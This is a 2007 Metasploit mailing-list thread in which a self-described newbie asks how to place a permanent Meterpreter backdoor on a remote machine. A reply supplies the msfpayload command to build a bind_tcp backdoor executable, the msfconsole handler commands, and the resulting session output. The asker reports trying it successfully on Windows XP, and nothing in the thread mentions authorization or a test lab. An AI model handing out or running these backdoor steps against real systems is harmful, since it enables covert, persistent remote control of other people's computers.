[framework] Place a Meterpreter backdoor
BardoBaggins
bardo at mclink.it
Fri May 11 10:58:09 CDT 2007
Thanks!
That was EXACTLY what I wanted to know :)
Tried it out and it worked perfectly... except for a little issue. If I try to
NMAP (SYN Scan) the 4444 port on the remote host to check if it's open,
the backdoor process crashes. This happened on a WinXP SP2 Italian.
Bye !
Bardo
Ramakrishna Nyayapathi wrote:
> Yes there is. In the framework directory,
>
> ./msfpayload windows/meterpreter/bind_tcp LPORT=4444 EXITFUNC=thread X > met_bkdoor.exe
>
> Executing this file on the target machine should set up a meterpreter
> backdoor on 4444.
>
> in msfconsole,
>
> msf > use multi/handler
> msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
> PAYLOAD => windows/meterpreter/bind_tcp
> msf exploit(handler) > set RHOST 1.2.3.4
> RHOST => 1.2.3.4
> msf exploit(handler) > exploit
> [*] Started bind handler
> [*] Starting the payload handler...
> [*] Transmitting intermediate stager for over-sized stage...(89 bytes)
> [*] Sending stage (2834 bytes)
> [*] Sleeping before handling stage...
> [*] Uploading DLL (81931 bytes)...
> [*] Upload completed.
> [*] Meterpreter session 1 opened (1.2.3.3:1376 -> 1.2.3.4:4444)
>
> meterpreter >
>
> Hope that helps..
>
>
> On 5/10/07, *BardoBaggins* <bardo at mclink.it> wrote:
>
> Hello !
>
> First, I would like to apologize if my question is kinda "dumb". I'm a
> newbie in the field and I'm ever longing for new knowledge.
>
> Anyway, the question is : Is it possible to place a permanent
> meterpreter process running on a remote machine acting as a backdoor ?
>
> Tnx. Bye !!
>
> Bardo
>
>